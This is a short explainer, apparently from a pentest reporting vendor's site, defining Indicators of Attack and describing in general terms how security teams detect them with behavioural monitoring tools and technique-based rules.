An Indicator of Attack (IOA) is a behavioral signal that suggests a threat actor is actively attempting to breach or exploit a system. Unlike Indicators of Compromise (IOCs), which are signs that an attack has already taken place, IOAs focus on the tactics, techniques, and procedures (TTPs) an attacker uses during the early or active stages of an attack.
For example, a user who unexpectedly runs PowerShell to download a file from a suspicious domain, followed by attempts to escalate privileges and disable antivirus software, may not trigger a traditional alert if no known malware is present. But the sequence of actions tells a story of an attack in progress. IOAs recognize that story and flag it—even in the absence of known threat signatures.
Want to save time on reporting?
Let PentestPad generate, track, and export your reports - automatically.
How to Use IOAs in Your Security Operations
To effectively detect IOAs, organizations must implement tools and practices that focus on behavioral monitoring and context analysis. This includes using Endpoint Detection and Response (EDR) platforms, Security Information and Event Management (SIEM) systems, and User and Entity Behavior Analytics (UEBA) tools.
Detection rules should be based on attacker techniques rather than static signatures. These rules should monitor for actions like privilege escalation attempts, suspicious scripting activity, unusual lateral movement, and unexpected process spawning. Correlation engines can then combine these behaviors into a timeline, flagging them as potential attacks.
Security teams should also regularly update detection playbooks based on real-world attack patterns, such as those found in the MITRE ATT&CK framework. This ensures that detection logic evolves with the threat landscape.
Want to save time on reporting?
Let PentestPad generate, track, and export your reports - automatically.